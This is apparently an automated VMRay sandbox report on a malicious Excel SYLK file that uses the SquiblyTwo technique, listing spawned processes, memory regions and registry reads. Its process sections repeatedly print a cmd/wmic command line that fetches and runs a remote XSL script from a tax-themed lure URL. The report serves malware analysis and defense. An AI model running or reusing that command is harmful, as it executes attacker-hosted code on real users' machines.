SLK file using SquiblyTwo | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 89/100
Target: Windows 10 (64-bit), MS Office 2016 (64-bit) | ms_office
Classification: -

3d479d661bdf4203f2dcdeaa932c3710ffb4a8edb6b0172a94659452d9c5c7f0 (SHA256)

Nil_Returns.slk

Excel Document

Created at 2018-06-26 20:58:00

Notifications (1/1)

The reputation status of contacted URLs and file hashes could not be determined since the reputation service was disabled during the submission.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xed8 Analysis Target Medium excel.exe "C:\Program Files\Microsoft Office\Office16\EXCEL.EXE" -
#2 0xccc Child Process Medium cmd.exe CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" #1
#4 0xd94 Child Process Medium wmic.exe wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" #2
#8 0xcd4 Child Process Medium cmd.exe CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" #1
#10 0x434 Child Process Medium wmic.exe wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" #8

Behavior Information - Grouped by Category

Process #1: excel.exe
0 0
»
Information Value
ID #1
File Name c:\program files\microsoft office\office16\excel.exe
Command Line "C:\Program Files\Microsoft Office\Office16\EXCEL.EXE"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:31, Reason: Analysis Target
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:10:09
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xed8
Parent PID 0x4f8 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C88
0x C7C
0x C58
0x C3C
0x C2C
0x C18
0x C04
0x 36C
0x FF4
0x FF0
0x FD0
0x FA8
0x FA0
0x F94
0x F84
0x F30
0x F20
0x F18
0x F14
0x F10
0x F08
0x F04
0x F00
0x EFC
0x EF8
0x EF4
0x EF0
0x EEC
0x EE0
0x EDC
0x B10
0x 2DC
0x F1C
0x F74
0x DE4
0x B88
0x B50
0x C28
0x C40
0x C54
0x 774
0x F98
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000818fe00000 0x818fe00000 0x818fffffff Private Memory Readable, Writable True False False -
private_0x0000008190000000 0x8190000000 0x81900fffff Private Memory Readable, Writable True False False -
private_0x0000008190100000 0x8190100000 0x81901fffff Private Memory Readable, Writable True False False -
private_0x0000008190200000 0x8190200000 0x81902fffff Private Memory Readable, Writable True False False -
private_0x0000008190300000 0x8190300000 0x81903fffff Private Memory Readable, Writable True False False -
private_0x0000008190400000 0x8190400000 0x81904fffff Private Memory Readable, Writable True False False -
private_0x0000008190500000 0x8190500000 0x81905fffff Private Memory Readable, Writable True False False -
private_0x0000008190600000 0x8190600000 0x81906fffff Private Memory Readable, Writable True False False -
private_0x0000008190700000 0x8190700000 0x81907fffff Private Memory Readable, Writable True False False -
private_0x0000008190800000 0x8190800000 0x81908fffff Private Memory Readable, Writable True False False -
private_0x0000008190900000 0x8190900000 0x81909fffff Private Memory Readable, Writable True False False -
private_0x0000008190b00000 0x8190b00000 0x8190bfffff Private Memory Readable, Writable True False False -
private_0x0000008190c00000 0x8190c00000 0x8190cfffff Private Memory Readable, Writable True False False -
private_0x0000008190d00000 0x8190d00000 0x8190dfffff Private Memory Readable, Writable True False False -
private_0x0000008190f00000 0x8190f00000 0x8190ffffff Private Memory Readable, Writable True False False -
private_0x0000008191000000 0x8191000000 0x81910fffff Private Memory Readable, Writable True False False -
private_0x0000008191100000 0x8191100000 0x81911fffff Private Memory Readable, Writable True False False -
private_0x0000008191200000 0x8191200000 0x81912fffff Private Memory Readable, Writable True False False -
private_0x0000008191300000 0x8191300000 0x81913fffff Private Memory Readable, Writable True False False -
private_0x0000008191400000 0x8191400000 0x81914fffff Private Memory Readable, Writable True False False -
private_0x0000008191500000 0x8191500000 0x81915fffff Private Memory Readable, Writable True False False -
private_0x0000008191600000 0x8191600000 0x81916fffff Private Memory Readable, Writable True False False -
private_0x0000008191700000 0x8191700000 0x81917fffff Private Memory Readable, Writable True False False -
private_0x0000008191800000 0x8191800000 0x81918fffff Private Memory Readable, Writable True False False -
private_0x0000008191900000 0x8191900000 0x81919fffff Private Memory Readable, Writable True False False -
private_0x0000008191a00000 0x8191a00000 0x8191afffff Private Memory Readable, Writable True False False -
private_0x0000008191b00000 0x8191b00000 0x8191bfffff Private Memory Readable, Writable True False False -
private_0x0000008191c00000 0x8191c00000 0x8191cfffff Private Memory Readable, Writable True False False -
private_0x0000008191e00000 0x8191e00000 0x8191efffff Private Memory Readable, Writable True False False -
private_0x0000008191f00000 0x8191f00000 0x8191ffffff Private Memory Readable, Writable True False False -
private_0x0000008192000000 0x8192000000 0x81920fffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8a380000 0x20f8a380000 0x20f8a38ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f8a390000 0x20f8a390000 0x20f8a396fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8a3a0000 0x20f8a3a0000 0x20f8a3b4fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a3c0000 0x20f8a3c0000 0x20f8a3c3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a3d0000 0x20f8a3d0000 0x20f8a3d0fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8a3e0000 0x20f8a3e0000 0x20f8a3e1fff Private Memory Readable, Writable True False False -
locale.nls 0x20f8a3f0000 0x20f8a4adfff Memory Mapped File Readable False False False -
pagefile_0x0000020f8a4b0000 0x20f8a4b0000 0x20f8a4b1fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8a4c0000 0x20f8a4c0000 0x20f8a4c6fff Private Memory Readable, Writable True False False -
private_0x0000020f8a4d0000 0x20f8a4d0000 0x20f8a4d0fff Private Memory Readable, Writable True False False -
private_0x0000020f8a4e0000 0x20f8a4e0000 0x20f8a4e0fff Private Memory Readable, Writable True False False -
private_0x0000020f8a4f0000 0x20f8a4f0000 0x20f8a4f0fff Private Memory Readable, Writable True False False -
private_0x0000020f8a500000 0x20f8a500000 0x20f8a500fff Private Memory Readable, Writable True False False -
private_0x0000020f8a510000 0x20f8a510000 0x20f8a60ffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8a610000 0x20f8a610000 0x20f8a611fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8a620000 0x20f8a620000 0x20f8a62ffff Private Memory - True False False -
pagefile_0x0000020f8a630000 0x20f8a630000 0x20f8a631fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a640000 0x20f8a640000 0x20f8a641fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a650000 0x20f8a650000 0x20f8a651fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a660000 0x20f8a660000 0x20f8a661fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a670000 0x20f8a670000 0x20f8a671fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a680000 0x20f8a680000 0x20f8a680fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f8a690000 0x20f8a690000 0x20f8a691fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a6a0000 0x20f8a6a0000 0x20f8a6cdfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f8a6d0000 0x20f8a6d0000 0x20f8a6dffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8a6e0000 0x20f8a6e0000 0x20f8a867fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a870000 0x20f8a870000 0x20f8a9f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8aa00000 0x20f8aa00000 0x20f8bdfffff Pagefile Backed Memory Readable True False False -
private_0x0000020f8be00000 0x20f8be00000 0x20f8be00fff Private Memory Readable, Writable True False False -
private_0x0000020f8be10000 0x20f8be10000 0x20f8be10fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8be20000 0x20f8be20000 0x20f8bedbfff Pagefile Backed Memory Readable True False False -
private_0x0000020f8bee0000 0x20f8bee0000 0x20f8befffff Private Memory Readable, Writable True False False -
office.odf 0x20f8bf00000 0x20f8c0b8fff Memory Mapped File Readable False False False -
pagefile_0x0000020f8c0c0000 0x20f8c0c0000 0x20f8c0c3fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8c0d0000 0x20f8c0d0000 0x20f8c0d6fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8c0e0000 0x20f8c0e0000 0x20f8c0e1fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8c0f0000 0x20f8c0f0000 0x20f8c1effff Private Memory Readable, Writable True False False -
private_0x0000020f8c1f0000 0x20f8c1f0000 0x20f8c1f0fff Private Memory Readable, Writable True False False -
private_0x0000020f8c200000 0x20f8c200000 0x20f8c200fff Private Memory Readable, Writable True False False -
private_0x0000020f8c210000 0x20f8c210000 0x20f8c210fff Private Memory Readable, Writable True False False -
msointl30.dll 0x20f8c220000 0x20f8c22efff Memory Mapped File Readable False False False -
private_0x0000020f8c230000 0x20f8c230000 0x20f8c236fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8c240000 0x20f8c240000 0x20f8c240fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f8c250000 0x20f8c250000 0x20f8c25ffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8c260000 0x20f8c260000 0x20f8c264fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f8c270000 0x20f8c270000 0x20f8c270fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8c280000 0x20f8c280000 0x20f8c28ffff Private Memory Readable, Writable True False False -
mso40uires.dll 0x20f8c290000 0x20f8c597fff Memory Mapped File Readable False False False -
mso99lres.dll 0x20f8c5a0000 0x20f8cec0fff Memory Mapped File Readable False False False -
msores.dll 0x20f8ced0000 0x20f91d0efff Memory Mapped File Readable False False False -
xlintl32.dll 0x20f91d10000 0x20f92d51fff Memory Mapped File Readable False False False -
sortdefault.nls 0x20f92d60000 0x20f93096fff Memory Mapped File Readable False False False -
pagefile_0x0000020f930a0000 0x20f930a0000 0x20f93591fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f935a0000 0x20f935a0000 0x20f935a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f935b0000 0x20f935b0000 0x20f935b0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f935c0000 0x20f935c0000 0x20f935c0fff Private Memory Readable, Writable True False False -
private_0x0000020f935d0000 0x20f935d0000 0x20f935d0fff Private Memory Readable, Writable True False False -
private_0x0000020f935e0000 0x20f935e0000 0x20f935e0fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f935f0000 0x20f935f0000 0x20f935f1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f93600000 0x20f93600000 0x20f93600fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f93610000 0x20f93610000 0x20f93610fff Private Memory Readable, Writable True False False -
private_0x0000020f93620000 0x20f93620000 0x20f93620fff Private Memory Readable, Writable True False False -
private_0x0000020f93630000 0x20f93630000 0x20f9363ffff Private Memory Readable, Writable True False False -
msointl.dll 0x20f93640000 0x20f937bafff Memory Mapped File Readable False False False -
pagefile_0x0000020f937c0000 0x20f937c0000 0x20f93fbffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f93fc0000 0x20f93fc0000 0x20f940bffff Private Memory Readable, Writable True False False -
private_0x0000020f940c0000 0x20f940c0000 0x20f942bffff Private Memory Readable, Writable True False False -
private_0x0000020f942c0000 0x20f942c0000 0x20f943bffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f943c0000 0x20f943c0000 0x20f9444bfff Pagefile Backed Memory Readable True False False -
private_0x0000020f94450000 0x20f94450000 0x20f94450fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f94460000 0x20f94460000 0x20f9446bfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f94470000 0x20f94470000 0x20f94471fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f94480000 0x20f94480000 0x20f9448bfff Pagefile Backed Memory Readable, Writable True False False -
normidna.nls 0x20f94490000 0x20f944a1fff Memory Mapped File Readable False False False -
comdlg32.dll.mui 0x20f944b0000 0x20f944bcfff Memory Mapped File Readable False False False -
pagefile_0x0000020f944c0000 0x20f944c0000 0x20f944c1fff Pagefile Backed Memory Readable True False False -
private_0x0000020f944d0000 0x20f944d0000 0x20f944d0fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f944e0000 0x20f944e0000 0x20f944e1fff Pagefile Backed Memory Readable True False False -
explorerframe.dll.mui 0x20f944f0000 0x20f944f6fff Memory Mapped File Readable False False False -
private_0x0000020f94500000 0x20f94500000 0x20f94503fff Private Memory Readable, Writable True False False -
private_0x0000020f94510000 0x20f94510000 0x20f94513fff Private Memory Readable, Writable True False False -
private_0x0000020f94520000 0x20f94520000 0x20f94523fff Private Memory Readable, Writable True False False -
private_0x0000020f94530000 0x20f94530000 0x20f94530fff Private Memory Readable, Writable True False False -
private_0x0000020f94540000 0x20f94540000 0x20f94542fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f94550000 0x20f94550000 0x20f9456efff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f94570000 0x20f94570000 0x20f9458efff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f94590000 0x20f94590000 0x20f94590fff Private Memory Readable, Writable True False False -
private_0x0000020f945a0000 0x20f945a0000 0x20f945a0fff Private Memory Readable, Writable True False False -
private_0x0000020f945b0000 0x20f945b0000 0x20f945b0fff Private Memory Readable, Writable True False False -
private_0x0000020f945c0000 0x20f945c0000 0x20f949bffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f949c0000 0x20f949c0000 0x20f949c1fff Pagefile Backed Memory Readable True False False -
private_0x0000020f949d0000 0x20f949d0000 0x20f949d0fff Private Memory Readable, Writable True False False -
~fontcache-system.dat 0x20f949e0000 0x20f94a55fff Memory Mapped File Readable False False False -
~fontcache-fontface.dat 0x20f94a60000 0x20f95a5ffff Memory Mapped File Readable False False False -
~fontcache-s-1-5-21-2172869166-1497266965-2109836178-1000.dat 0x20f95a60000 0x20f9625ffff Memory Mapped File Readable False False False -
segoeui.ttf 0x20f96260000 0x20f9633efff Memory Mapped File Readable False False False -
d2d1.dll.mui 0x20f96340000 0x20f96381fff Memory Mapped File Readable False False False -
private_0x0000020f96390000 0x20f96390000 0x20f9678ffff Private Memory Readable, Writable True False False -
private_0x0000020f96790000 0x20f96790000 0x20f96f8ffff Private Memory Readable, Writable True False False -
segoeuil.ttf 0x20f96f90000 0x20f97063fff Memory Mapped File Readable False False False -
seguisb.ttf 0x20f97070000 0x20f97152fff Memory Mapped File Readable False False False -
segoeuib.ttf 0x20f97160000 0x20f9723bfff Memory Mapped File Readable False False False -
private_0x0000020f97240000 0x20f97240000 0x20f97240fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f97250000 0x20f97250000 0x20f97325fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f97330000 0x20f97330000 0x20f97330fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f97340000 0x20f97340000 0x20f97375fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f97380000 0x20f97380000 0x20f9738ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f97390000 0x20f97390000 0x20f9739ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f973a0000 0x20f973a0000 0x20f973affff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f973b0000 0x20f973b0000 0x20f977b7fff Private Memory Readable, Writable True False False -
private_0x0000020f977c0000 0x20f977c0000 0x20f97bd0fff Private Memory Readable, Writable True False False -
private_0x0000020f97be0000 0x20f97be0000 0x20f97fe2fff Private Memory Readable, Writable True False False -
private_0x0000020f97ff0000 0x20f97ff0000 0x20f97ff0fff Private Memory Readable, Writable True False False -
private_0x0000020f98000000 0x20f98000000 0x20f98000fff Private Memory Readable, Writable True False False -
private_0x0000020f98010000 0x20f98010000 0x20f9808ffff Private Memory Readable, Writable True False False -
c_1255.nls 0x20f98090000 0x20f980a0fff Memory Mapped File Readable False False False -
staticcache.dat 0x20f980b0000 0x20f990effff Memory Mapped File Readable False False False -
cversions.2.db 0x20f990f0000 0x20f990f3fff Memory Mapped File Readable True False False -
For performance reasons, the remaining 335 entries are omitted.
The remaining entries can be found in flog.txt.
Process #2: cmd.exe
48 0
»
Information Value
ID #2
File Name c:\windows\system32\cmd.exe
Command Line CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:09:53
OS Process Information
»
Information Value
PID 0xccc
Parent PID 0xed8 (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x E0
0x E24
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000194dd00000 0x194dd00000 0x194ddfffff Private Memory Readable, Writable True False False -
private_0x000000194de00000 0x194de00000 0x194dffffff Private Memory Readable, Writable True False False -
private_0x000000194e000000 0x194e000000 0x194e0fffff Private Memory Readable, Writable True False False -
private_0x000001ebe75c0000 0x1ebe75c0000 0x1ebe75dffff Private Memory Readable, Writable True False False -
pagefile_0x000001ebe75c0000 0x1ebe75c0000 0x1ebe75cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000001ebe75d0000 0x1ebe75d0000 0x1ebe75d6fff Private Memory Readable, Writable True False False -
pagefile_0x000001ebe75e0000 0x1ebe75e0000 0x1ebe75f4fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001ebe7600000 0x1ebe7600000 0x1ebe7603fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001ebe7610000 0x1ebe7610000 0x1ebe7610fff Pagefile Backed Memory Readable True False False -
private_0x000001ebe7620000 0x1ebe7620000 0x1ebe7621fff Private Memory Readable, Writable True False False -
private_0x000001ebe7630000 0x1ebe7630000 0x1ebe772ffff Private Memory Readable, Writable True False False -
locale.nls 0x1ebe7730000 0x1ebe77edfff Memory Mapped File Readable False False False -
private_0x000001ebe77f0000 0x1ebe77f0000 0x1ebe77f6fff Private Memory Readable, Writable True False False -
private_0x000001ebe7970000 0x1ebe7970000 0x1ebe797ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x1ebe7980000 0x1ebe7cb6fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ffa10000 0x7df5ffa10000 0x7ff5ffa0ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff648e50000 0x7ff648e50000 0x7ff648f4ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff648f50000 0x7ff648f50000 0x7ff648f72fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x7ff649110000 0x7ff649169fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
Host Behavior
File (7)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\Wbem\WMIC.exe os_pid = 0xd94, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff649110000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\SYSTEM32\CMD.EXE, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ffc17143270 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ffc17148940 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ffc17147460 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50 True 1
Fn
Environment (15)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\Nd9E1FYi\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #4: wmic.exe
769 285
»
Information Value
ID #4
File Name c:\windows\system32\wbem\wmic.exe
Command Line wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:48, Reason: Child Process
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:09:52
OS Process Information
»
Information Value
PID 0xd94
Parent PID 0xccc (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x DF0
0x 3B0
0x E44
0x E4C
0x E58
0x E54
0x D84
0x E68
0x E6C
0x 13C
0x A44
0x ABC
0x DDC
0x DD8
0x EC4
0x CC4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
msvcr80.dll 0x5cfe0000 0x5d0a8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x0000003500000000 0x3500000000 0x35001fffff Private Memory Readable, Writable True False False -
private_0x0000003500200000 0x3500200000 0x350027ffff Private Memory Readable, Writable True False False -
private_0x0000003500280000 0x3500280000 0x35002fffff Private Memory Readable, Writable True False False -
private_0x0000003500300000 0x3500300000 0x350037ffff Private Memory Readable, Writable True False False -
private_0x0000003500380000 0x3500380000 0x35003fffff Private Memory Readable, Writable True False False -
private_0x0000003500400000 0x3500400000 0x350047ffff Private Memory Readable, Writable True False False -
private_0x0000003500480000 0x3500480000 0x35004fffff Private Memory Readable, Writable True False False -
private_0x0000003500500000 0x3500500000 0x350057ffff Private Memory Readable, Writable True False False -
private_0x00000233e1000000 0x233e1000000 0x233e101ffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1000000 0x233e1000000 0x233e100ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000233e1010000 0x233e1010000 0x233e1016fff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1020000 0x233e1020000 0x233e1034fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1040000 0x233e1040000 0x233e1043fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1050000 0x233e1050000 0x233e1050fff Pagefile Backed Memory Readable True False False -
private_0x00000233e1060000 0x233e1060000 0x233e1061fff Private Memory Readable, Writable True False False -
locale.nls 0x233e1070000 0x233e112dfff Memory Mapped File Readable False False False -
private_0x00000233e1130000 0x233e1130000 0x233e1136fff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1140000 0x233e1140000 0x233e1140fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1150000 0x233e1150000 0x233e1150fff Pagefile Backed Memory Readable True False False -
private_0x00000233e1160000 0x233e1160000 0x233e11dffff Private Memory Readable, Writable True False False -
private_0x00000233e1160000 0x233e1160000 0x233e11bffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1160000 0x233e1160000 0x233e1161fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1170000 0x233e1170000 0x233e1170fff Pagefile Backed Memory Readable, Writable True False False -
msxml3r.dll 0x233e1180000 0x233e1180fff Memory Mapped File Readable False False False -
private_0x00000233e1190000 0x233e1190000 0x233e11affff Private Memory - True False False -
private_0x00000233e11b0000 0x233e11b0000 0x233e11bffff Private Memory Readable, Writable True False False -
wmic.exe.mui 0x233e11c0000 0x233e11cffff Memory Mapped File Readable False False False -
private_0x00000233e11d0000 0x233e11d0000 0x233e11dffff Private Memory Readable, Writable True False False -
private_0x00000233e11e0000 0x233e11e0000 0x233e11e0fff Private Memory Readable, Writable True False False -
private_0x00000233e11f0000 0x233e11f0000 0x233e11f0fff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1200000 0x233e1200000 0x233e1200fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1200000 0x233e1200000 0x233e1203fff Pagefile Backed Memory Readable True False False -
private_0x00000233e1210000 0x233e1210000 0x233e130ffff Private Memory Readable, Writable True False False -
rpcss.dll 0x233e1310000 0x233e13ecfff Memory Mapped File Readable False False False -
ole32.dll 0x233e1310000 0x233e1452fff Memory Mapped File Readable False False False -
private_0x00000233e1310000 0x233e1310000 0x233e14dffff Private Memory Readable, Writable True False False -
private_0x00000233e1310000 0x233e1310000 0x233e144ffff Private Memory Readable, Writable True False False -
private_0x00000233e1310000 0x233e1310000 0x233e138ffff Private Memory Readable, Writable True False False -
imm32.dll 0x233e1310000 0x233e1348fff Memory Mapped File Readable False False False -
private_0x00000233e1310000 0x233e1310000 0x233e1310fff Private Memory Readable, Writable True False False -
private_0x00000233e1320000 0x233e1320000 0x233e1320fff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1330000 0x233e1330000 0x233e134ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000233e1330000 0x233e1330000 0x233e1330fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x233e1340000 0x233e1340fff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000233e1350000 0x233e1350000 0x233e1350fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000233e1360000 0x233e1360000 0x233e136ffff Pagefile Backed Memory Readable True False False -
